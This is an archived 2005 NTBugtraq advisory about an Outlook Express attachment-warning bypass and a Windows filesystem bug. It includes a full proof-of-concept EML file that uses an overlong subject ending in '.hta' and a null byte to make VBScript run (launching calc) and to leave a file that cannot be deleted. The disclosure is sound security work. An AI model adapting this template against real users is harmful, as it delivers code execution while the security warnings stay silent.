Microsoft Windows - Filesystem bug allows various things

From: Benjamin Tobias Franz (0-1-2-3_at_GMX.DE)
Date: 06/03/05

  • Next message: NGSEC: "[NGSEC] AntiPharming v1.00 FREE" 
    Date:         Fri, 3 Jun 2005 16:30:21 +0200
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Microsoft Windows - Filesystem bug allows various things

    Description:
    A bug in Microsoft Windows can be exploited to create files, which can not
    be accessed by ("normal") programs and Windows itself. You can not access
    (open, rename, delete, ...) such files. The file properties can not be read
    or changed, too. To create such files an attacker must send an special
    formed email to a victim and the victim must open an attachment (e.g. a
    text-file - but im sure, there is a way to create such files from remote
    without opening attachments).

    The weakness can be exploited by malicious people to trick users into
    opening a malicious attachment, too:
    Microsoft Outlook Express will open any executable attachment without
    showing the correct warning message (for software) and the real type of the
    file, if an email is special formed and the OE option to block attachments,
    which can contain viruses is disabled (many users have disabled this). OE
    will only show its normal (warning) message.

    Proof-of-Concept exploit (save as EML file):
    ===>>> PoC - Start <<<===
    From:"Benjamin Tobias Franz"<0-1-2-3@gmx.de>
    To:You
    Subject:MSOE - Attachment Download Security Restriction Bypass
    Date:Wed, 1 Jun 2005
    Content-Type:multipart/mixed;boundary="btf"

    --btf
    Content-Type: text/plain;

    Open the attachment and you will see:
    1. MS OE will not show the correct warning message (for software)
    2. MS OE will not show any file type
    3. MS OE will create a non-accessible file

    Regards,

    Benjamin Tobias Franz
    Germany
    --btf
    Content-Type:message/rfc822
    Content-Transfer-Encoding:quoted-printable

    <!--
    Subject:BTF's MSOE Attachment Download Security Restriction Bypass=
    .hta=00.btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
    btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
    btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
    btfbtf
    -->
    <title>YOU ARE VULNERABLE</title>
    <script language=3Dvbscript>set btf=3Dcreateobject("wscript.shell")
    btf.run("calc")</script><body style=3D"background-color:red;font-si=
    ze:40px;"><b>YOU ARE VULNERABLE (If you do not see this =
    message in an email-message window)!!!</b><br><br><br>Regards,
    <br><br>Benjamin Tobias Franz<br>Germany</body>
    --btf--

    ===>>> PoC - End <<<===

    Technical details :
    When Microsoft Outlook Express finds an attachment with content-type
    "message/rfc822" and no file name is specified, it will use the subject of
    the attached message for file name. To exploit this the subject must contain
    more than 255 chars and end with: file extension + binary 0 + dot +
    anything. So the file will not be opened as EML file; but the included file
    extension (before binary 0) will be used to detect the program to open (but
    not to detect the file type).
    The created file will be saved in a subdirectory of directory "Content.IE5"
    (You can open it by running "C:\Documents and Settings\*Your Username*\Local
    Settings\Temporary Internet Files\Content.IE5\"). You can find the file by
    searching in this directory (and its subdirectories) for files which include
    "BTF's MSOE Attachment Download Security Restriction Bypass" in their name.
    You will find a file displayed as hidden system file and you can not access
    or delete it.

    Affected software:
    Microsoft Windows

    Workaround:
    -

    Date of discovery:
    01. June 2005

    Tested software:
    Fully patched system running Windows XP SP2.
    Microsoft Outlook Express 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

    DLL versions:
    MSOE.DLL: 6.00.2900.2527 (xpsp_sp2_gdr.040919-1056)
    MSOERES.DLL: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

    Regards,

    Benjamin Tobias Franz
    Germany 

    --
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
  • Next message: NGSEC: "[NGSEC] AntiPharming v1.00 FREE"